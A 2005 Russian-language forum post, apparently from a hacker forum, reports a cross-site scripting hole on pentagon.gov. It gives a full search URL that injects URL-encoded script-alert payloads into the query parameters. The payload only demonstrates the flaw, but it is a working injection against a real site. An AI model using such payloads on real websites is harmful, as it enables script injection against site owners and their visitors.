Показать сообщение отдельно

Xss на сайте Пентагона
  #1  
Старый 10.11.2005, 11:47
XgLuiR
Новичок
Регистрация: 07.11.2005
Сообщений: 18
С нами: 10792504

Репутация: 0
По умолчанию Xss на сайте Пентагона

На сайте www.pentagon.gov найденна XSS-уязвимость. Пример:

http://www.pentagon.gov/srch/search?
template=%2Fsearch%2Fresults-template-dl.html
&c=%3Cscript%3Ealert(%22www.xss.ru%22)%3C/script%3E&c=8268333F54379065
&c=6FDF5BD0BF338D19&c=1DA2190B5E9F39D2&q=
%3Cscript%3Ealert%28%22x%22%29%3C%2Fscript%3E&subm it=
Search&subcat=briefing+slides&sort=-pub_date
 
Ответить с цитированием